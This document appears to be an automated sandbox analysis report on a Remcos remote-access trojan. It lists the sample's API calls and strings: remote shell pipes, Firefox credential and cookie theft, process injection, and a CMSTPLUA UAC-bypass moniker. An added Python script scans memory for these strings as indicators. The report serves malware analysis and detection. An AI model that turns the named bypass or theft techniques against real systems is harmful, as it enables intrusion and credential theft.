                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                        • API String ID: 1067849700-181434739
                                                                                        • Opcode ID: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                                                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                                        • Opcode Fuzzy Hash: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                                                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                        • API String ID: 2994406822-18413064
                                                                                        • Opcode ID: 0423482584964133d0d19e65db76f813d50334c39a223a4c681c84889f8ac799
                                                                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                                        • Opcode Fuzzy Hash: 0423482584964133d0d19e65db76f813d50334c39a223a4c681c84889f8ac799
                                                                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                        • API String ID: 3018269243-13974260
                                                                                        • Opcode ID: 1b0d93be84d51118ccd1b6052d9a017b8cd45349acbaf203cacd4182d68b5e1b
                                                                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                                        • Opcode Fuzzy Hash: 1b0d93be84d51118ccd1b6052d9a017b8cd45349acbaf203cacd4182d68b5e1b
                                                                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                        • API String ID: 1164774033-3681987949
                                                                                        • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                                                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                                        • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                                                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenClipboard.USER32 ref: 004168C2
                                                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                        • String ID: !D@
                                                                                        • API String ID: 3520204547-604454484
                                                                                        • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                                                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                                        • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                                                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                        • API String ID: 3527384056-432212279
                                                                                        • Opcode ID: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                                                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                                        • Opcode Fuzzy Hash: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                                                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                        • String ID:
                                                                                        • API String ID: 297527592-0
                                                                                        • Opcode ID: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
                                                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                        • Opcode Fuzzy Hash: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
                                                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                        • API String ID: 3756808967-1743721670
                                                                                        • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                                                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                        • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                                                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                        • API String ID: 0-1861860590
                                                                                        • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                                                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                        • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                                                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00407521
                                                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object_wcslen
                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                        • API String ID: 240030777-3166923314
                                                                                        • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                        • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
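The strings the blocks above carry are the ones worth hunting for in process memory: the `Elevation:Administrator!new:` moniker and the `{3E5FC7F9-9A51-4367-9063-A120244FBEC7}` class id that CoGetObject receives (the CMSTPLUA auto-elevation path, with the UACMe-style `[+] ucmAllocateElevatedObject` debug text left in), the Firefox profile path with its `[Firefox cookies found, cleared!]` message, and the `ieinstal.exe` injection target. The Python below is an added example, not Joe Sandbox or Remcos code. It scans a buffer for those strings in both ASCII and UTF-16LE, since the moniker is a wide string when it reaches CoGetObject while the Firefox messages in the `FindFirstFileA` block are narrow. The buffer it scans is constructed inline and is not this sample's dump.

```python
"""Scan a memory buffer for the Remcos and UAC-bypass strings listed in the
report blocks above, in ASCII and UTF-16LE form. Added example; not Joe Sandbox
or Remcos code."""

# Indicator text taken from the "String ID" lines above. The moniker and CLSID
# are what CoGetObject receives (wide); the Firefox messages are narrow strings.
INDICATORS = {
    "uac_elevation_moniker": "Elevation:Administrator!new:",
    "cmstplua_clsid": "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "uacme_debug_string": "[+] ucmAllocateElevatedObject",
    "firefox_profile_path": "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\",
    "firefox_cookie_wipe": "[Firefox cookies found, cleared!]",
    "ie_injection_target": "ieinstal.exe",
}


def encodings(text: str) -> dict:
    """Both byte forms a Win32 program can hold a string in."""
    return {"ascii": text.encode("ascii"), "wide": text.encode("utf-16-le")}


def scan(buf: bytes) -> list:
    """Return (indicator, encoding, offset) for every occurrence, ordered by offset."""
    hits = []
    for name, text in INDICATORS.items():
        for enc, needle in encodings(text).items():
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                hits.append((name, enc, pos))
                start = pos + 1          # keep going: a string may appear more than once
    return sorted(hits, key=lambda h: h[2])


def verdict(hits: list) -> dict:
    """Combine raw hits into the behaviours the report attributes to this sample."""
    names = {h[0] for h in hits}
    return {
        # the moniker alone is generic; paired with the CMSTPLUA CLSID it is the specific bypass
        "cmstplua_uac_bypass": {"uac_elevation_moniker", "cmstplua_clsid"} <= names,
        "firefox_cookie_tamper": bool({"firefox_profile_path", "firefox_cookie_wipe"} & names),
        "remcos_ie_injection": "ie_injection_target" in names,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a dump (not this sample's memory): padding around
    the strings in the encodings the program would actually hold them in."""
    moniker = "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
    return (b"\x00" * 64
            + moniker.encode("utf-16-le") + b"\x00\x00"
            + bytes(range(256))                      # filler containing every byte value
            + b"[Firefox cookies found, cleared!]\x00"
            + b"\x90" * 32
            + "ieinstal.exe".encode("utf-16-le") + b"\x00" * 16)


if __name__ == "__main__":
    found = scan(build_sample())
    for name, enc, off in found:
        print(f"{off:#08x} {enc:5} {name}")
    print(verdict(found))
```

These strings come from the memory dump of process 6 at 0x400000 that the blocks cite, i.e. the unpacked image, so run the scan over process dumps rather than the packed file on disk, where the same text need not appear in the clear.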

                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                        • String ID:
                                                                                        • API String ID: 3587775597-0
                                                                                        • Opcode ID: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                        • Opcode Fuzzy Hash: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                        • String ID: lJD$lJD$lJD
                                                                                        • API String ID: 745075371-479184356
                                                                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
